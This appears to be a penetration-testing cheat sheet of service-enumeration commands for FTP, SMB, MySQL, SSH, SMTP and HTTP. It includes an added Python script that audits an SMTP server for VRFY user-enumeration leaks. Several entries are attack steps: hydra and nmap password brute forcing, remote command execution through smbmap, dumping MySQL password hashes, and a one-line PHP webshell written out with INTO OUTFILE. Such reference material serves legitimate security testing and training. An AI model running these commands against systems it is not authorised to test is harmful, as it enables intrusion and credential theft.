Service Enumeration

21 - FTP

| Command | Description |
|---|---|
| `nmap -p 21 --script ftp-anon,ftp-bounce,ftp-syst,ftp-brute <IP>` | FTP NSE scripts: anonymous access, FTP bounce, system/version info, brute force. |
| `ftp <IP>` | Connect interactively (try `anonymous` with a blank or e-mail-style password). |
| `nc -nv <IP> 21` | Raw connection to grab the banner. |
| `wget -m --no-passive ftp://anonymous:anonymous@<IP>` | Recursively mirror everything readable by the anonymous account (drop `--no-passive` if active mode is blocked by a firewall). |
| `use auxiliary/scanner/ftp/ftp_version` | MSF - FTP version detection. |
| `use auxiliary/scanner/ftp/anonymous` | MSF - Check anonymous FTP access. |
139/445 - SMB

| Command | Description |
|---|---|
| `nmap -p 445 --script smb-os-discovery,smb-security-mode,smb2-security-mode <IP>` | OS discovery and SMB signing status (SMBv1 and SMBv2). |
| `nmap -p 445 --script smb-enum-shares,smb-enum-users,smb-enum-sessions <IP>` | Enumerate shares, users and sessions. |
| `nmap -p 445 --script smb-enum-shares --script-args smbusername=admin,smbpassword=pass <IP>` | Authenticated SMB enumeration. |
| `nmap -p 445 --script smb-vuln-ms17-010 <IP>` | Check for EternalBlue (MS17-010). |
| `smbclient -N -L //<IP>` | List shares with a null session. |
| `smbclient //<IP>/<share> -N` | Connect to a share anonymously. |
| `smbmap -H <IP>` | List shares and permissions. |
| `smbmap -H <IP> -u <user> -p <pass> -x 'ipconfig'` | Execute a command via SMB (needs administrative rights on the target). |
| `smbmap -H <IP> -u <user> -p <pass> --download 'C$\flag.txt'` | Download a file via SMB. |
| `rpcclient -U "" -N <IP>` | Null session with rpcclient. |
| `enum4linux -a <IP>` | Full SMB enumeration (shares, users, OS info). |
| `enum4linux -U <IP>` | User enumeration only. |
| `enum4linux -r <IP>` | RID cycling to enumerate local users. |
| `use auxiliary/scanner/smb/smb_version` | MSF - SMB version detection. |
| `use auxiliary/scanner/smb/smb_enumshares` | MSF - Enumerate shares. |
| `use auxiliary/scanner/smb/pipe_auditor` | MSF - Enumerate named pipes. |
| `nmblookup -A <IP>` | NetBIOS name lookup. |
rpcclient Commands (after connecting)

| Command | Description |
|---|---|
| `srvinfo` | Server info. |
| `enumdomusers` | List domain users. |
| `enumdomgroups` | List domain groups. |
| `lookupnames <user>` | Look up a specific username. |
3306 - MySQL

| Command | Description |
|---|---|
| `nmap -p 3306 --script mysql-info,mysql-databases,mysql-empty-password <IP>` | MySQL info, database listing and empty-password check. |
| `mysql -h <IP> -u root` | Connect as root with no password (empty-password check). |
| `mysql -h <IP> -u <user> -p` | Connect with a password prompt. |
| `use auxiliary/scanner/mysql/mysql_version` | MSF - MySQL version. |
| `use auxiliary/scanner/mysql/mysql_login` | MSF - MySQL brute force. |
| `use auxiliary/scanner/mysql/mysql_schemadump` | MSF - Dump all database schemas. |
| `use auxiliary/scanner/mysql/mysql_writable_dirs` | MSF - Find directories the MySQL server can write to (relevant for `INTO OUTFILE`). |
MySQL Commands (after connecting)

| Command | Description |
|---|---|
| `SHOW DATABASES;` | List all databases. |
| `USE <database>;` | Select a database. |
| `SHOW TABLES;` | List tables in the selected database. |
| `SELECT * FROM <table>;` | Dump all rows from a table. |
| `SELECT user, password FROM mysql.user;` | Dump MySQL user hashes (on MySQL 5.7+ the column is `authentication_string`, not `password`). |
| `SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE '/var/www/html/shell.php';` | Write a webshell (requires the FILE privilege and a path permitted by `secure_file_priv`). |
22 - SSH

| Command | Description |
|---|---|
| `nmap -p 22 --script ssh2-enum-algos <IP>` | List supported SSH key-exchange, cipher and MAC algorithms. |
| `nmap -p 22 --script ssh-auth-methods --script-args ssh.user=root <IP>` | Check which authentication methods are accepted for a user. |
| `nmap -p 22 --script ssh-hostkey <IP>` | Retrieve the SSH host key fingerprint. |
| `nmap -p 22 --script ssh-brute --script-args userdb=/tmp/users.txt <IP>` | SSH brute force via nmap (add `passdb=<file>` for a password list). |
| `hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<IP>` | Hydra SSH brute force, single user. |
| `hydra -L users.txt -P passwords.txt ssh://<IP>` | Hydra SSH brute force with user and password lists. |
| `use auxiliary/scanner/ssh/ssh_version` | MSF - SSH version detection. |
| `use auxiliary/scanner/ssh/ssh_login` | MSF - SSH brute force. |
25 - SMTP

| Command | Description |
|---|---|
| `nmap -p 25 --script smtp-enum-users,smtp-open-relay <IP>` | Enumerate users and check for an open relay. |
| `telnet <IP> 25` | Connect manually. |
| `nc <IP> 25` | Connect with netcat. |
| `smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t <IP>` | Enumerate users via VRFY. |
| `smtp-user-enum -M RCPT -U users.txt -D <domain> -t <IP>` | Enumerate users via RCPT TO. |
| `use auxiliary/scanner/smtp/smtp_version` | MSF - SMTP version and banner. |
| `use auxiliary/scanner/smtp/smtp_enum` | MSF - User enumeration. |
SMTP Manual Commands (after connecting with telnet/nc)

| Command | Description |
|---|---|
| `EHLO test` | Extended hello; lists supported extensions (look for VRFY, EXPN, STARTTLS, AUTH). |
| `VRFY <user>` | Verify whether a user exists (250/251 confirms, 550 rejects, 252 means the server will not say; many MTAs disable it with 502). |
| `RCPT TO:<user@domain>` | Check whether an address is accepted (send `MAIL FROM:<test@example.com>` first or the server answers 503). |
| `EXPN <list>` | Expand a mailing list. |
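The manual SMTP exchange above is what the VRFY/RCPT enumeration tools automate, and the same exchange is how a mail administrator checks whether their own MTA leaks account existence. The script below is an added example, not part of the original cheat sheet: it parses an EHLO reply for advertised extensions, classifies the reply codes VRFY returns, and decides whether a known-good and a bogus address get distinguishable answers (the differential the enumeration tools rely on). It uses only the Python standard library; the EHLO transcript, the hostname in it and the `no-such-user-zq7` probe name are constructed placeholders, and `check_live()` is the optional part that talks to a real server.

```python
"""Audit an SMTP server for the VRFY/EXPN user-enumeration exposure listed
above. Added example (not the cheat sheet's own code); standard library only.
"""
import smtplib

# Constructed multi-line EHLO reply in the shape an MTA returns (RFC 5321):
# every line but the last is "250-...", the last is "250 ...".
SAMPLE_EHLO = (
    "250-mail.example.test\r\n"
    "250-PIPELINING\r\n"
    "250-SIZE 10240000\r\n"
    "250-VRFY\r\n"
    "250-ETRN\r\n"
    "250-STARTTLS\r\n"
    "250-ENHANCEDSTATUSCODES\r\n"
    "250-8BITMIME\r\n"
    "250 DSN"
)


def parse_ehlo(reply: str) -> set:
    """Return the set of extension keywords advertised in an EHLO reply.

    The first line carries the server's hostname/greeting, not an extension,
    so it is skipped; each remaining line is "250-KEYWORD [params]" (or
    "250 KEYWORD [params]" on the final line).
    """
    lines = [ln.strip() for ln in reply.splitlines() if ln.strip()]
    exts = set()
    for ln in lines[1:]:
        body = ln[4:] if ln[:3] == "250" and ln[3:4] in "- " else ln
        if body:
            exts.add(body.split()[0].upper())
    return exts


def classify_reply(code: int) -> str:
    """Map a VRFY/EXPN/RCPT reply code to what it tells the caller."""
    if code in (250, 251):
        return "confirmed"    # mailbox known (251: will forward)
    if code == 252:
        return "unverified"   # "cannot VRFY, but will accept" - no real answer
    if code in (550, 551, 553):
        return "rejected"     # mailbox unknown / unavailable
    if code in (500, 501, 502, 503, 504):
        return "disabled"     # command not implemented or refused outright
    return "other"


def leaks_existence(code_known: int, code_unknown: int) -> bool:
    """True when a known-good and a bogus address get distinguishable replies.

    That difference is what user-enumeration tools exploit. A server that
    answers both with 252, or refuses the command for both, is not leaking
    anything through this command.
    """
    known, unknown = classify_reply(code_known), classify_reply(code_unknown)
    if "disabled" in (known, unknown):
        return False
    return known != unknown


def assess(exts: set, vrfy_known: int, vrfy_unknown: int) -> dict:
    """Combine the advertised extensions and the two VRFY probes into a verdict."""
    return {
        "advertises_vrfy": "VRFY" in exts,
        "advertises_expn": "EXPN" in exts,
        "starttls": "STARTTLS" in exts,
        "vrfy_leaks": leaks_existence(vrfy_known, vrfy_unknown),
    }


def check_live(host: str, port: int = 25, known: str = "postmaster",
               bogus: str = "no-such-user-zq7", timeout: float = 10.0) -> dict:
    """Run the assessment against a server you administer.

    "postmaster" must exist on any RFC-compliant MTA, so it is the known-good
    probe; the bogus local part is an assumed nonexistent name.
    """
    with smtplib.SMTP(host, port, timeout=timeout) as s:
        code, _ = s.ehlo()
        if code != 250:
            raise RuntimeError(f"EHLO refused with reply code {code}")
        exts = {k.upper() for k in s.esmtp_features}  # smtplib lowercases keys
        code_known, _ = s.verify(known)
        code_bogus, _ = s.verify(bogus)
    return assess(exts, code_known, code_bogus)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        result = check_live(sys.argv[1])
    else:
        # Offline demonstration on the constructed transcript: VRFY answered
        # 252 for the real user and 550 for the bogus one, which is a leak.
        result = assess(parse_ehlo(SAMPLE_EHLO), 252, 550)
    for key, value in result.items():
        print(f"{key}: {value}")
```

Run it with a hostname argument to test a live server, or without one to see the verdict on the constructed transcript. The useful finding for a defender is `vrfy_leaks`: a server that advertises VRFY but answers 252 for every address is not revealing anything, whereas 252 for real users and 550 for unknown ones is exactly what `smtp-user-enum` keys on.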
80/443 - HTTP

| Command | Description |
|---|---|
| `nmap --script http-enum -p 80 <IP>` | Enumerate common web directories and files. |
| `nmap --script http-headers -p 80 <IP>` | Retrieve HTTP response headers. |
| `nmap --script http-methods -p 80 <IP>` | List allowed HTTP methods. |
| `nmap --script http-webdav-scan -p 80 <IP>` | Check for WebDAV. |
| `nmap --script http-title -p 80 <IP>` | Grab the page title. |
| `use auxiliary/scanner/http/http_version` | MSF - HTTP server version. |
| `use auxiliary/scanner/http/robots_txt` | MSF - Retrieve robots.txt. |
| `use auxiliary/scanner/http/dir_scanner` | MSF - Directory brute force. |